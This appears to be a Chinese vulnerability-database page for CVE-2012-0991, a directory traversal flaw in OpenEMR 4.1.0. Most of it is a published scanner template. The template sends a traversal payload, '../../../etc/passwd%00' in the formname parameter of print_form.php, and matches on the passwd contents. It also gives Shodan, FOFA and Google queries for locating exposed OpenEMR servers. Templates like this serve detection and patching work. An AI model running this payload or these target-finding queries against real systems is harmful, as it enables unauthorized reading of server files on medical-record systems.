CVE-2012-0991: OpenEMR 4.1 - Local File Inclusion

日期: 2025-08-01 | 影响软件: OpenEMR | POC: 已公开

漏洞描述

Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.

PoC代码[已公开]

id: CVE-2012-0991

info:
  name: OpenEMR 4.1 - Local File Inclusion
  author: daffainfo
  severity: low
  description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of OpenEMR.
  reference:
    - https://www.exploit-db.com/exploits/36650
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0991
    - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/72914
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N
    cvss-score: 3.5
    cve-id: CVE-2012-0991
    cwe-id: CWE-22
    epss-score: 0.70708
    epss-percentile: 0.98654
    cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openemr
    product: openemr
    shodan-query:
      - http.html:"openemr"
      - http.title:"openemr"
      - http.favicon.hash:1971268439
    fofa-query:
      - icon_hash=1971268439
      - body="openemr"
      - title="openemr"
      - app="openemr"
    google-query: intitle:"openemr"
  tags: cve,cve2012,lfi,openemr,traversal,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402202afed493764e1bc51b6f1535c54388bb604b8bfcb94db2faeeba952cb39ab73802202bff4325d3b3dc4fe73ce6a3d07a4e3377c25bb89574078bd1e7ce1d749c53bd:922c64590222798bb761d5b6d8e72950

相关漏洞推荐